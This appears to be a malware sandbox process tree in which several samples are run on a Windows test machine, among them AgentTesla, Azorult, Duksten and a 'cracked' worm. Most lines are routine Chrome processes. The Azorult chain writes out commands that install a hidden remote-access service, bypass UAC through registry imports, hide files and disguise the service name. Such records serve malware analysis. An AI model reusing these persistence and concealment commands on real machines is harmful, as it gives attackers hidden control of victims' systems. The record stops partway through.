- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3036,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3052 /prefetch:1
  2⤵
  PID:4816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3048,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3084 /prefetch:1
  2⤵
  PID:424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4484,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3744 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4592,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:3756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4668,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4672 /prefetch:1
  2⤵
  PID:3192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4812 /prefetch:8
  2⤵
  PID:1008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:1600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5140,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5160 /prefetch:8
  2⤵
  PID:2768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4980,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4984 /prefetch:1
  2⤵
  PID:3448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5340,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:3836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5372,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5400 /prefetch:8
  2⤵
  PID:5056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5368,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5516 /prefetch:8
  2⤵
  PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5748,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5764 /prefetch:8
  2⤵
  PID:2588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4452,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  PID:1448
- C:\Users\Admin\Downloads\website ip grabber.exe
  "C:\Users\Admin\Downloads\website ip grabber.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D0C8.tmp\website ip grabber.bat""
    3⤵
    PID:3276
  - - C:\Windows\SysWOW64\PING.EXE
      ping https://www.roblox.com/
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5688,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4584 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=4032,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6096,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3044 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5852,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5888 /prefetch:8
  2⤵
  PID:1900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5876,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5912 /prefetch:8
  2⤵
  PID:4400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=4456,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3984 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6112,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5608 /prefetch:1
  2⤵
  PID:4948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=724,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6004 /prefetch:8
  2⤵
  PID:4436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4344,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=1448 /prefetch:8
  2⤵
  PID:432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5572,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4696 /prefetch:8
  2⤵
  PID:2224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5844,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5880 /prefetch:8
  2⤵
  PID:1820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6044,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6156 /prefetch:8
  2⤵
  PID:5024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3308,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5316 /prefetch:8
  2⤵
  PID:1396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6028,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6472 /prefetch:8
  2⤵
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6484,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6076 /prefetch:8
  2⤵
  PID:2840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6584,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5840 /prefetch:8
  2⤵
  PID:3492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6504,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6384 /prefetch:8
  2⤵
  PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6600,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5856 /prefetch:8
  2⤵
  PID:4064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6328,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6648 /prefetch:8
  2⤵
  PID:4208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6672,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5468 /prefetch:8
  2⤵
  PID:1464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6256,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6432 /prefetch:8
  2⤵
  PID:776
- C:\Users\Admin\Downloads\Aurora Worm v1-Cracked by RoN1N.exe
  "C:\Users\Admin\Downloads\Aurora Worm v1-Cracked by RoN1N.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetWindowsHookEx
  PID:5052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3268,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  PID:1956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6868,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6820 /prefetch:8
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6268,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6384 /prefetch:8
  2⤵
  PID:3292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6312,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6872 /prefetch:8
  2⤵
  PID:4932
- C:\Users\Admin\Downloads\Amus.exe
  "C:\Users\Admin\Downloads\Amus.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  PID:4060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6432,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  PID:776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6136,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4660 /prefetch:8
  2⤵
  PID:2616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=6904,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6880 /prefetch:1
  2⤵
  PID:1804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3528,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6156 /prefetch:8
  2⤵
  PID:2376
- C:\Users\Admin\Downloads\Duksten.exe
  "C:\Users\Admin\Downloads\Duksten.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:1952
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 692
    3⤵
    - Program crash
    PID:3112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6088,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6552 /prefetch:8
  2⤵
  PID:1476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4660,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6768 /prefetch:8
  2⤵
  PID:760
- C:\Users\Admin\Downloads\AgentTesla.exe
  "C:\Users\Admin\Downloads\AgentTesla.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:5100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5840,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6908 /prefetch:8
  2⤵
  PID:1820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6016,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6004 /prefetch:8
  2⤵
  PID:2924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6012,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6428 /prefetch:8
  2⤵
  PID:508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6148,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3356 /prefetch:8
  2⤵
  PID:3588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6508,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5468 /prefetch:8
  2⤵
  PID:620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7048,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=7056 /prefetch:8
  2⤵
  PID:3892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7116,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  PID:4416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5636,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=7160 /prefetch:8
  2⤵
  PID:3720
- C:\Users\Admin\Downloads\Azorult (1).exe
  "C:\Users\Admin\Downloads\Azorult (1).exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Blocks application from running via registry modification
  - Drops file in Drivers directory
  - Checks computer location settings
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Hide Artifacts: Hidden Users
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - System policy modification
  PID:2452
- - C:\ProgramData\Microsoft\Intel\wini.exe
    C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:4972
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
      4⤵
      Checks computer location settings
      PID:404
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        5⤵
        
        PID:2052
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        6⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        Runs .reg file with regedit
        
        PID:752
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        6⤵
        Runs .reg file with regedit
        
        PID:3624
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        Delays execution with timeout.exe
        
        PID:2860
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:700
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2992
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4476
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        6⤵
        Views/modifies file attributes
        
        PID:404
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:4540
      - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        6⤵
        Launches sc.exe
        
        PID:3204
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        6⤵
        Launches sc.exe
        
        PID:3292
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        6⤵
        Launches sc.exe
        
        PID:3972
  - - C:\ProgramData\Windows\winit.exe
      "C:\ProgramData\Windows\winit.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:3976
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        5⤵
        
        PID:4540
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:5048
- - C:\programdata\install\cheat.exe
    C:\programdata\install\cheat.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:620
  - - C:\ProgramData\Microsoft\Intel\taskhost.exe
      "C:\ProgramData\Microsoft\Intel\taskhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2256
    - - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3556
    - - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:3204
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1052
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        7⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4732
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:4972
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:1612
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:3616
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        8⤵
        
        PID:2200
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        8⤵
        Executes dropped EXE
        
        PID:2056
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:1136
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:4812
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        8⤵
        Checks computer location settings
        
        PID:3292
        
        C:\Windows\SysWOW64\cmd.exe
